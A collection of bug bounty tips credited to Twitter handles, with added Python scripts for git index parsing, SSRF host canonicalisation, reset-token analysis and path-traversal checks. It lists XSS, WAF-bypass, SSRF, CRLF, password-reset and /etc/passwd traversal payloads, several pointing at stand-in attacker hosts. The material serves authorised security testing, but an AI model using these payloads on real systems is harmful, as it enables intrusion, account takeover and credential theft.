Hints

Below are bug bounty tips, each credited to the Twitter handle that posted it.

@D0rkerDevil

Webarchive > internet.domain.com > dirsearch > found a .git/index file; used gin to read the index file

pip3 install gin
gin <path-to-index-file>

found a .env file

opened it > full of credentials, giving access to their MySQL database

connect using:

mysql -u username -p -h <ip/host>
password: <password>
</mysql>
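What gin does with that index file is walk the fixed-size entry records and print the tracked paths, which is how the .env file above was spotted. The parser below is an added example written for this page (it is not gin and not code from the tweet's author); it builds a constructed v2 index in memory so it runs offline, then lists every path and flags the ones worth retrieving next. The file list, modes and sizes are made up, and the SECRET_PATH regex is an assumed starting list, not anything the tip prescribes.

```python
"""Parse a leaked .git/index and list the tracked paths (constructed sample data, not a real repo)."""
import hashlib
import re
import struct
import sys
from typing import Dict, List, Tuple

# Assumed list of file names that usually hold credentials; extend for the target's stack.
SECRET_PATH = re.compile(
    r"(^|/)(\.env(\..*)?|.*\.pem|id_rsa|id_ed25519|.*\.key|.*secrets?.*|wp-config\.php|.*\.sql|.*\.bak)$",
    re.I,
)

# Constructed sample: (path, mode, size) tuples standing in for a real repository's index.
SAMPLE_FILES = [(".env", 0o100644, 120), ("config/database.yml", 0o100644, 300),
                ("certs/server.pem", 0o100644, 1704), ("src/app.py", 0o100755, 2048)]


def build_index(files: List[Tuple[str, int, int]], version: int = 2) -> bytes:
    """Build a minimal index file so the parser can be exercised without a real .git directory."""
    body = b"DIRC" + struct.pack(">II", version, len(files))
    for path, mode, size in files:
        name = path.encode()
        # ctime s/ns, mtime s/ns, dev, ino, mode, uid, gid, size: ten big-endian 32-bit fields
        rec = struct.pack(">10I", 0, 0, 0, 0, 0, 0, mode, 0, 0, size)
        rec += hashlib.sha1(name).digest()                  # stands in for the blob id
        rec += struct.pack(">H", min(len(name), 0xFFF))     # flags: low 12 bits carry the name length
        rec += name + b"\0"
        rec += b"\0" * ((8 - len(rec) % 8) % 8)             # entry is NUL-padded to a multiple of 8
        body += rec
    return body + hashlib.sha1(body).digest()               # trailing checksum over all preceding bytes


def parse_index(data: bytes) -> List[Dict[str, object]]:
    """Walk the entries of a v2/v3 index; v4 (prefix-compressed names) is rejected."""
    if data[:4] != b"DIRC":
        raise ValueError("not a git index (missing DIRC signature)")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):
        raise ValueError(f"index version {version} not handled")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        print("warning: checksum mismatch (truncated or altered file)", file=sys.stderr)
    entries, off = [], 12
    for _ in range(count):
        fields = struct.unpack(">10I", data[off:off + 40])
        blob = data[off + 40:off + 60].hex()
        (flags,) = struct.unpack(">H", data[off + 60:off + 62])
        start = off + 62
        if version == 3 and flags & 0x4000:   # extended flag: one more 16-bit word before the name
            start += 2
        namelen = flags & 0xFFF
        if namelen < 0xFFF:
            name = data[start:start + namelen]
        else:                                 # long names saturate the length field: read up to NUL
            name = data[start:data.index(b"\0", start)]
            namelen = len(name)
        entries.append({"path": name.decode("utf-8", "replace"), "mode": oct(fields[6]),
                        "size": fields[9], "blob": blob})
        used = start - off + namelen          # bytes of this entry before the NUL padding
        off += (used & ~7) + 8                # 1 to 8 NUL bytes bring the entry to a multiple of 8
    return entries


def secret_candidates(entries: List[Dict[str, object]]) -> List[str]:
    """Paths to fetch first from the exposed repo or the deployed directory."""
    return [str(e["path"]) for e in entries if SECRET_PATH.search(str(e["path"]))]


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_index(SAMPLE_FILES)
    found = parse_index(data)
    for e in found:
        print(f"{e['mode']:>8} {e['size']:>7} {str(e['blob'])[:12]} {e['path']}")
    print("worth a look:", secret_candidates(found))
```

Run it against a downloaded file with `python3 git_index_paths.py index`; with no argument it parses the constructed sample. The index only names the files; to get their contents you still need the matching objects under .git/objects or a readable copy on the web root, which is why the .env in the tip was fetched directly afterwards.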

@Sh_O_A1b

amass enum -d target.com -passive -o s3subs.txt
s3scanner s3subs.txt

Might find hidden misconfigured S3 buckets; if you have write permissions, you can take over the bucket and report it as High/P2

Twitter - PhpMyAdmin Account Takeover

1. Found a WordPress website with a search parameter

2. Got an easy XSS on the same parameter

3. While looking to make more impact with the XSS, the application crashed unexpectedly.

4. The error message revealed the "Database Connection String", revealing the DB name, username, password, etc.

5. Did some more research; directory brute force got me a "phpmyadmin" directory at /c/soft/phpmyadmin.

6. Used the credentials revealed from the connection string and logged in successfully.

Takeaway

  • If you get XSS on WordPress, try some random other payloads.

  • The application's logic may break and reveal internal information.

  • Recon, recon & recon to see the use of the information

@Wh11teW0lf

"Jenkinsfile" can give you passwords from a Jenkins instance. Add this to your wordlist

anydomain.com:8080/Jenkinsfile

@PortSwiggerRes

Firefox is the only browser which allows self closing script.

@HusseiN98D

XXE via METADATA injected in image bytes → blind SSRF via local DTD → grabbed AWS EC2 credentials blindly → pwned

@GochaOkradze

Bypass F5 BIG-IP WAF with an XSS payload

Interesting: %5k is converted to the "P" character

Payload

"><P/onwheel=alert(1)>mouse wheel here<!--

Injected payload (URL-encoded): %22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--

@Enesdex

Easy XSS automation tip

cat subdomain.txt | waybackurls >> wayback.txt
cat subdomain.txt | hakrawler -depth 3 -plain >> spider.txt
cat spider.txt wayback.txt | kxss

hakrawler by @hakluke
waybackurls, kxss by @TomNomNom

dalfox is recommended instead of kxss:

cat spider.txt | grep "=" | dalfox pipe

dalfox by @hahwul

@rez0__

Use ffuf for vhost fuzzing on every new domain to find hidden servers/admin panels:

ffuf -c -u https://target.com -H "Host: FUZZ" -w vhost_wordlist.txt

Pro-tip: do both "Host: FUZZ" and "Host: FUZZ.target.com"

@pwntheweb

Fuzzing list to find SSRF

site.com/?url=FUZZ
http://169.254.169.254\0.google.com   <=== PHP CVE (2020)
https://[0:0:0:0:0:0:0:0]
https://0.0.0.0
https://[::]
https://0177.1
https://0x7f.1
https://0x7f000001
https://2130706433
https://127.000.001
https://[0:0:0:0:0:ffff:0.0.0.0]
https://[::ffff:0.0.0.0]
https://017700000001
https://[0:0:0:0:0:ffff:127.0.0.1]
https://[::ffff:127.0.0.1]/
https://[::ffff:7f00:2]
https://[:ffff:127.0.0.1]
https://[::ffff:7f00:1]
https://[0:0:0:0:0:ffff:127.0.0.2]
https://[::ffff:169.254.169.254]
https://[0:0:0:0:0:ffff:169.254.169.254]
https://[::ffff:127.0.0.2]
https://[::ffff:a9fe:a9fe]
https://[::ffff:0:0]
https://169-254-169-254.nip.io
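Most entries in that list are the same two addresses, 127.0.0.1 and 169.254.169.254, written in forms that a string-based blocklist does not recognise but the socket layer does: octal and hex octets, a single 32-bit integer, fewer than four dotted parts (glibc inet_aton fills the missing bytes from the last part), IPv4-mapped IPv6, and a NUL byte that ends the string for C-based parsers. The script below is an added example for this page, not code from the tweet's author: it canonicalises each payload's host without touching DNS and reports where it really points, which is both the reason the list works and the normalisation a defender's allowlist should do before comparing. The `\0` on the page is embedded here as a real NUL byte; the nip.io entry needs DNS and is reported as unparsed. Ports and userinfo are deliberately not handled.

```python
"""Canonicalise the host of an SSRF payload and say where it really points (no DNS)."""
import ipaddress
from typing import Optional, Tuple

# Constructed from the page's list; "\0" on the page becomes an actual NUL byte here.
PAYLOADS = [
    "http://169.254.169.254\x00.google.com",
    "https://[0:0:0:0:0:0:0:0]", "https://0.0.0.0", "https://[::]",
    "https://0177.1", "https://0x7f.1", "https://0x7f000001", "https://2130706433",
    "https://127.000.001", "https://[::ffff:0.0.0.0]", "https://017700000001",
    "https://[::ffff:127.0.0.1]/", "https://[::ffff:7f00:2]", "https://[:ffff:127.0.0.1]",
    "https://[::ffff:a9fe:a9fe]", "https://[::ffff:0:0]", "https://169-254-169-254.nip.io",
]


def _parse_part(p: str) -> Optional[int]:
    # inet_aton rules: "0x" prefix is hex, a leading "0" is octal, anything else decimal
    try:
        if p[:2].lower() == "0x":
            return int(p[2:], 16)
        if len(p) > 1 and p[0] == "0":
            return int(p, 8)
        return int(p, 10)
    except ValueError:
        return None


def inet_aton_like(host: str) -> Optional[str]:
    """Emulate glibc inet_aton(): 1 to 4 dotted parts; the last part fills the remaining bytes."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    vals = [_parse_part(p) for p in parts]
    if any(v is None or v < 0 for v in vals) or any(v > 255 for v in vals[:-1]):
        return None
    tail_bytes = 5 - len(parts)            # 4, 3, 2 or 1 bytes carried by the last part
    if vals[-1] >= 1 << (8 * tail_bytes):
        return None
    num = 0
    for v in vals[:-1]:
        num = (num << 8) | v
    num = (num << (8 * tail_bytes)) | vals[-1]
    return str(ipaddress.IPv4Address(num))


def canonical_ip(host: str) -> Optional[str]:
    """Canonical address for a URL host, or None if it is not a literal address."""
    # A NUL ends the string for C-based parsers: a check that saw "...google.com"
    # is followed by a connect() to 169.254.169.254.
    host = host.split("\x00", 1)[0]
    if host.startswith("[") and host.endswith("]"):
        try:
            v6 = ipaddress.IPv6Address(host[1:-1])
        except ipaddress.AddressValueError:
            return None
        # ::ffff:a.b.c.d / ::ffff:xxxx:xxxx are IPv4-mapped; dual-stack sockets deliver them over IPv4
        return str(v6.ipv4_mapped) if v6.ipv4_mapped is not None else str(v6)
    return inet_aton_like(host)


def classify(host: str) -> Optional[Tuple[str, str]]:
    """(canonical address, reachability class) or None when only DNS could resolve it."""
    canon = canonical_ip(host)
    if canon is None:
        return None
    addr = ipaddress.ip_address(canon)
    if addr.is_loopback:
        label = "loopback"
    elif addr.is_link_local:
        label = "link-local"       # 169.254.0.0/16 hosts the cloud metadata services
    elif addr.is_unspecified:
        label = "unspecified"      # 0.0.0.0 and :: connect to the local host on most stacks
    elif addr.is_private:
        label = "private"
    else:
        label = "public"
    return canon, label


def host_of(url: str) -> str:
    """Crude host extraction that keeps brackets and NUL bytes (no port or userinfo handling)."""
    rest = url.split("://", 1)[-1]
    return rest.split("/", 1)[0]


if __name__ == "__main__":
    for url in PAYLOADS:
        result = classify(host_of(url))
        print(f"{url!r:45} -> {result if result else 'unparsed (needs DNS or is invalid)'}")
```

The `[:ffff:127.0.0.1]` entry is not a valid IPv6 literal and is reported as such; it is still worth sending, since a lenient server-side parser may accept what the standard library rejects. For the hostname entries (nip.io and friends) the equivalent check is to resolve the name and classify every returned address, then connect to the address you checked rather than resolving again.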

@faizalabroni

Just found and triaged a private program report for bypassing HTTP auth: change the method from GET to POST

GET /oauth2login got HTTP auth
POST /oauth2login/index/ bypassed it to an internal panel

@hussein98d

Testing password reset functionalities:

1) Include your mail as a second parameter (you might receive the reset link):

POST /reset
[...]
email=victim@tld.xyz&email=hacker@tld.xyz

2) Brute force the reset token if it is numeric. You can use IP Rotator in Burp Suite to bypass the rate limit in case it's IP based:

POST /reset
[...]
email=victim@tld.xyz&code=$BRUTE$

3) Try to use your reset token on the target's account:

POST /reset
[...]
email=victim@tld.xyz&code=$YOUR-TOKEN$

4) Host header injection: change website.com to hacker.com (the victim might receive the reset link with your host instead of the original website's)

POST /reset
Host: hacker.com
[...]

5) Try to figure out how the tokens are generated. Examples can be:

- Generated based on a timestamp

- Generated based on the ID of the user

- Generated based on the email of the user
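Step 5 can be checked offline once you hold one reset token for your own account. The script below is an added example for this page, not code from the tweet's author: it takes a token together with the things an attacker knows (the email, a user ID, and the time the mail arrived) and asks whether the token is one of those values, or a plain MD5/SHA-1/SHA-256 of them, alone or concatenated with a Unix timestamp in a window around delivery. The sample token is constructed here as md5(email + timestamp) so the script has something to find; the candidate combinations and the hash list are assumptions to extend for the target.

```python
"""Does a reset token derive from something the attacker already knows? (offline check)"""
import hashlib
from typing import Dict, Optional

ALGS = ("md5", "sha1", "sha256")   # assumed list; add the target's favourites


def candidates(email: str, user_id: int, received_at: int, window: int) -> Dict[str, str]:
    """label -> value to compare or hash. Timestamps cover +/- window seconds around delivery."""
    c = {
        "email": email,
        "email.lower": email.lower(),
        "user_id": str(user_id),
        "user_id+email": f"{user_id}{email}",
        "email+user_id": f"{email}{user_id}",
    }
    for ts in range(received_at - window, received_at + window + 1):
        c[f"ts={ts}"] = str(ts)
        c[f"ts_ms={ts}000"] = f"{ts}000"          # millisecond clocks, whole seconds only
        c[f"email+ts={ts}"] = f"{email}{ts}"
        c[f"ts+email={ts}"] = f"{ts}{email}"
        c[f"user_id+ts={ts}"] = f"{user_id}{ts}"
    return c


def guess_token_source(token: str, email: str, user_id: int, received_at: int,
                       window: int = 120) -> Optional[Dict[str, str]]:
    """Return {"source": label, "alg": name} for the first candidate that explains the token."""
    token = token.strip().lower()
    for label, value in candidates(email, user_id, received_at, window).items():
        if token == value.lower():
            return {"source": label, "alg": "plain"}
        data = value.encode()
        for alg in ALGS:
            h = hashlib.new(alg, data)
            # only hash with an output length that matches the token's hex length
            if h.digest_size * 2 == len(token) and h.hexdigest() == token:
                return {"source": label, "alg": alg}
    return None


# Constructed sample: token minted as md5(email + unix_time) three seconds before the mail arrived.
SAMPLE_EMAIL, SAMPLE_ID, SAMPLE_RECEIVED = "victim@tld.xyz", 1337, 1700000000
SAMPLE_TOKEN = hashlib.md5(f"{SAMPLE_EMAIL}{SAMPLE_RECEIVED - 3}".encode()).hexdigest()
SAMPLE_TOKEN_EMAIL_ONLY = hashlib.sha1(SAMPLE_EMAIL.encode()).hexdigest()

if __name__ == "__main__":
    for tok in (SAMPLE_TOKEN, SAMPLE_TOKEN_EMAIL_ONLY, "0" * 32):
        print(tok, "->", guess_token_source(tok, SAMPLE_EMAIL, SAMPLE_ID, SAMPLE_RECEIVED))
```

A hit means the token for any victim can be computed from their email or ID plus a short timestamp window, which turns step 3 from a guess into a calculation. No hit only rules out these simple constructions; base64 tokens, HMACs with a server secret, or random tokens will not match, and that is the expected result for a sound implementation.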

@xlocux

1- Completely remove the token

2- Change it to 000000000000

3- Use a null/nil value

4- Try an expired token

5- Try an array of old tokens

6- Look for race conditions

7- Change 1 char at the beginning/end to see if the token is evaluated

8- Use Unicode character jutsu to spoof the email address

9- Try victim@email.com&attacker@email.com; use %20 or | as separators

10- Try to register the same mail with a different TLD (.eu, .net, etc.)

11- Don't add the domain (locu@)

12- Try SQLi bypass and wildcards: or, %, *

13- Request smuggling

14- Change the request method (GET, PUT, POST, etc.) and/or content type (XML <> JSON)

15- Match the bad response and replace it with a good one

16- Use a super long string

@akita_zen

With CRLF: /resetPassword?%0a%0dHost:attacker.tld (x-host, true-client-ip, x-forwarded...)

@11xuxx credit to @joohoi

Using ffuf the right way and gaining admin access

1. "ffuf -u ... -mc all" -> match all response codes

2. Ctrl+C after 5 seconds

3. "ffuf -u ... -mc all -fw ..."

4. Found a backdoor the developer used to log in as admin (response code 404)

@z33_5h4n

Filter bypass

<style/><img src="z'z</style><script/z>alert(1)</script>">
<sempak/merah>alert(1)</sempak>">
<script/z> can load external JS:
<script/z src=//external.com/1.js>

@rodoassis

Bootstrap payload bypassing WAF filters

<Brute Data-Spy=scroll Data-Target='<Svg OnLoad=(confirm) (1)>'>

@Random_Robbie

Got an SSRF inside a company ASN?

No cloud metadata endpoint to hit?

Don't forget to scan for internal hosts and try sqlmap

sqlmap via SSRF!

@RockyBandana

Arbitrary file read

![a](/uploads/1111111111111111111111111111111111111111111111111/../../../../../../../../../../../../../../../../../etc/passwd)
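The payload works because the image handler joins the requested path onto its upload directory and lets the `../` segments walk back out of it; the long run of 1s is just a first segment deep enough that a naive prefix or length check passes. The script below is an added example for this page, not code from the tweet's author: it extracts the target from the Markdown, shows the naive join landing on /etc/passwd, and beside it the confined resolver that decodes, normalises and then refuses anything that did not stay under the root. The document root `/srv/app/public` and the regex are assumptions; the payload is rebuilt from the page's shape (a 49-character segment followed by seventeen `../`).

```python
"""Markdown image target -> filesystem path: the naive join beside a root-confined resolver."""
import posixpath
import re
from typing import List, Optional
from urllib.parse import unquote

UPLOAD_ROOT = "/srv/app/public"                      # assumed document root, not from the page
IMAGE_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")   # ![alt](target); whitespace ends the target

# Constructed from the page's payload: a long first segment, then enough "../" to climb past the root.
PAYLOAD = "![a](/uploads/" + "1" * 49 + "/" + "../" * 17 + "etc/passwd)"


def image_paths(markdown: str) -> List[str]:
    """Every image target in the Markdown, in order."""
    return IMAGE_RE.findall(markdown)


def resolve_unsafe(root: str, requested: str) -> str:
    """What a vulnerable handler does: decode, concatenate, normalise. '..' walks out of root."""
    return posixpath.normpath(root + "/" + unquote(requested))


def resolve_safe(root: str, requested: str) -> Optional[str]:
    """Decode first, normalise, then keep only results that are still at or below root."""
    root = posixpath.normpath(root)
    requested = unquote(requested)
    if "\0" in requested:                              # a NUL would truncate the path in open()
        return None
    # lstrip so an absolute request cannot make join() discard the root
    full = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if full == root or full.startswith(root + "/"):
        return full
    return None


if __name__ == "__main__":
    for p in image_paths(PAYLOAD):
        print("requested:", p[:40] + "...")
        print("naive    :", resolve_unsafe(UPLOAD_ROOT, p))
        print("confined :", resolve_safe(UPLOAD_ROOT, p))
```

This is pure string logic, which is what the check must be before any filesystem call; on a real server add `os.path.realpath` on the result so a symlink inside the upload directory cannot point back outside it, and decode only once, since double-decoding reintroduces the `%2e%2e` bypass the decode step is meant to neutralise.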
